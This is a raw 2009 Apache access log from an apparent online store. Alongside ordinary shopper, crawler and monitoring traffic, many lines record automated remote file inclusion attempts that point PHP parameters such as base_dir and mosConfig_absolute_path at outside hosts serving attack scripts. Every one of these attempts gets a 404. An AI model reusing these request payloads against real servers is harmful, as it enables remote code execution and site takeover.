222.131.116.8 - - [20/Jul/2009:04:10:31 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.78.62.84 - - [20/Jul/2009:04:10:33 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:04:10:42 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:10:43 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:10:43 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:10:44 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
61.78.62.84 - - [20/Jul/2009:04:10:44 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:10:44 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.191.43.177 - - [20/Jul/2009:04:10:45 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:10:45 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
61.78.62.84 - - [20/Jul/2009:04:10:49 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:10:54 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.15.55.45 - - [20/Jul/2009:04:11:10 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:04:11:11 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
211.15.55.45 - - [20/Jul/2009:04:11:11 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
89.188.129.126 - - [20/Jul/2009:04:11:21 -0400] "GET /logs/access_log.Q109060900//vote_main.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:04:11:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.100.5.136 - - [20/Jul/2009:04:11:45 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.25.134.14 - - [20/Jul/2009:04:12:01 -0400] "GET /logs/access_log.Q109062800//Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.25.134.14 - - [20/Jul/2009:04:12:01 -0400] "GET /logs/access_log.Q109051100//Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.117.207.76 - - [20/Jul/2009:04:12:16 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.117.207.76 - - [20/Jul/2009:04:12:16 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
82.195.150.228 - - [20/Jul/2009:04:12:18 -0400] "GET /logs/access_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:12:18 -0400] "GET /logs/config.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
118.129.166.10 - - [20/Jul/2009:04:13:45 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:13:48 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:13:50 -0400] "GET /logs/access_log.Q109051200%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:13:51 -0400] "GET /logs/access_log.Q109052600%20%20//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:04:14:03 -0400] "GET /logs/access_log.Q109071500%20%20//bbs/skin/ggambo7002_gallery/dq_thumb_engine2.php?path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
212.193.229.157 - - [20/Jul/2009:04:14:17 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.169.189.169 - - [20/Jul/2009:04:14:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A0415E144700154203D+M37+ENG HTTP/1.1" 200 58140 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319F455204E70060C203D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:14:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24354540700474203E+M37+ENG HTTP/1.1" 200 58443 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A0415E144700154203D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:15:01 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24551D4E70069A203E+M37+ENG HTTP/1.1" 200 58142 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24354540700474203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
82.195.150.228 - - [20/Jul/2009:04:15:36 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:15:36 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
124.0.145.1 - - [20/Jul/2009:04:15:39 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.169.189.169 - - [20/Jul/2009:04:15:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2495A143700617203E+M37+ENG HTTP/1.1" 200 47179 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24551D4E70069A203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
124.0.145.1 - - [20/Jul/2009:04:15:58 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.169.189.169 - - [20/Jul/2009:04:16:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG HTTP/1.1" 200 63046 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2495A143700617203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:02 -0400] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:03 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:03 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:03 -0400] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:03 -0400] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:03 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:12 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24150744700A35203E+M37+ENG HTTP/1.1" 200 63628 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D50A46700908203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
72.30.78.231 - - [20/Jul/2009:04:16:18 -0400] "GET /logs/access_log.Q108020800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.169.189.169 - - [20/Jul/2009:04:16:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG HTTP/1.1" 200 40427 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24150744700A35203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_inside-corner.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:22 -0400] "GET /images/sd_left-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24D5994D700AAF203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
209.59.12.99 - - [20/Jul/2009:04:16:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.169.189.169 - - [20/Jul/2009:04:16:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2455D34B700B62203E+M37+ENG HTTP/1.1" 200 57473 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
61.100.5.136 - - [20/Jul/2009:04:16:42 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.169.189.169 - - [20/Jul/2009:04:16:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2455D34B700B62203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2445C04B700C14203E+M37+ENG HTTP/1.1" 200 57777 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2455D34B700B62203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24B5F648700C5F203E+M37+ENG HTTP/1.1" 200 58137 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2445C04B700C14203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:54 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24E55F44700CDC203E+M37+ENG HTTP/1.1" 200 41697 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24B5F648700C5F203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:16:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24459748700D0E203E+M37+ENG HTTP/1.1" 200 58213 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24E55F44700CDC203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:17:11 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2465984F700D0E203E+M37+ENG HTTP/1.1" 200 40427 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24459748700D0E203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:17:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2445804F700EFA203E+M37+ENG HTTP/1.1" 200 57473 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
82.195.150.228 - - [20/Jul/2009:04:17:30 -0400] "GET /logs/access_log.Q109061400/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:17:30 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:17:31 -0400] "GET /logs/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
121.169.189.169 - - [20/Jul/2009:04:17:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24756645700E79203E+M37+ENG HTTP/1.1" 200 57622 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2445804F700EFA203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
82.195.150.228 - - [20/Jul/2009:04:17:31 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
121.169.189.169 - - [20/Jul/2009:04:17:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A2475EC4B700FD9203E+M37+ENG HTTP/1.1" 200 58139 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24756645700E79203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:17:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24A50B4C700FD0203E+M37+ENG HTTP/1.1" 200 44434 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A2475EC4B700FD9203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
121.169.189.169 - - [20/Jul/2009:04:17:39 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A24C5C04E700F66203E+M37+ENG HTTP/1.1" 200 60630 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24A50B4C700FD0203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
82.195.150.228 - - [20/Jul/2009:04:17:41 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
82.195.150.228 - - [20/Jul/2009:04:17:50 -0400] "GET /logs/access_log.Q109070500/index.php?_zb_path=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
121.169.189.169 - - [20/Jul/2009:04:17:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3131A3405AE497000E2203E+M37+ENG HTTP/1.1" 200 40427 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3131A24C5C04E700F66203E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
62.140.23.185 - - [20/Jul/2009:04:18:19 -0400] "GET //errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
62.140.23.185 - - [20/Jul/2009:04:18:19 -0400] "GET /logs//errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
62.140.23.185 - - [20/Jul/2009:04:18:19 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
62.140.23.185 - - [20/Jul/2009:04:18:24 -0400] "GET /logs/error_log.Q109060800//errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
66.235.124.7 - - [20/Jul/2009:04:18:53 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
72.30.78.231 - - [20/Jul/2009:04:19:06 -0400] "GET /logs/error_log.Q109020400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.195.150.228 - - [20/Jul/2009:04:19:10 -0400] "GET /index.php?_zb_path=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
66.235.124.7 - - [20/Jul/2009:04:19:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.1" 200 71818 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
61.78.62.84 - - [20/Jul/2009:04:20:22 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:20:22 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:20:22 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:20:50 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:20:50 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:20:50 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.63.91.170 - - [20/Jul/2009:04:20:52 -0400] "GET /administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.63.91.170 - - [20/Jul/2009:04:20:52 -0400] "GET /logs/access_log.Q109051000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.63.91.170 - - [20/Jul/2009:04:20:52 -0400] "GET /logs/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:21:12 -0400] "GET /logs/access_log.Q109070200%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:04:21:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [20/Jul/2009:04:21:48 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:21:48 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:21:48 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.30.78.231 - - [20/Jul/2009:04:22:09 -0400] "GET /logs/access_log.Q108052500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.63.91.170 - - [20/Jul/2009:04:22:29 -0400] "GET /logs/access_log.Q109051000%20%20/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:04:22:44 -0400] "GET /logs//citywriter/head.php?path=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
